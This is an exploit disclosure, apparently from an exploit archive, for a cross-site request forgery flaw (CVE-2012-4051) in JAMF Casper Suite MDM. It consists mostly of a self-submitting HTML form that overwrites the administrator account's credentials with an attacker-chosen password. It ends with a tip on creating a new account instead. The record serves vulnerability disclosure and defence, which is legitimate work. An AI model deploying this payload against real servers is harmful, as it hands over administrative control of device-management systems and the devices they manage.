JAMF Casper Suite MDM suffers from a cross site request forgery vulnerability.
cf040459d9566c7ec0296767cfadc0a7c77290c27d5f32c1c12b7b58c1b369b8
CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
# Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF
# Date: Discovered and reported July 2012
# Author: Jacob Holcomb/Gimppy042
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
# CVE : CVE-2012-4051 for the CSRF
<head>
<title>PwNd JAMF Casper Admin CSRF BY:Jacob Holcomb</title>
</head>
<body>
<form name="csrf"
action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post">
<input type="hidden" name="view" value="Save"/>
<input type="hidden" name="source" value="jss"/>
<input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/>
<input type="hidden" name="lastTab" value="Account"/>
<input type="hidden" name="username" value="Gimppy"/>
<input type="hidden" name="realname" value="Pwnd"/>
<input type="hidden" name="email" value="Admin"/>
<input type="hidden" name="phone" value="Password"/>
<input type="hidden" name="password" value="pwnd1"/>
<input type="hidden" name="vpassword" value="pwnd1"/>
<input type="hidden" name="user_id" value="1"/>
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
If the HTML parameter/variable "user_id" is changed to a value of negative
one (-1) this request to the web server will create a new user.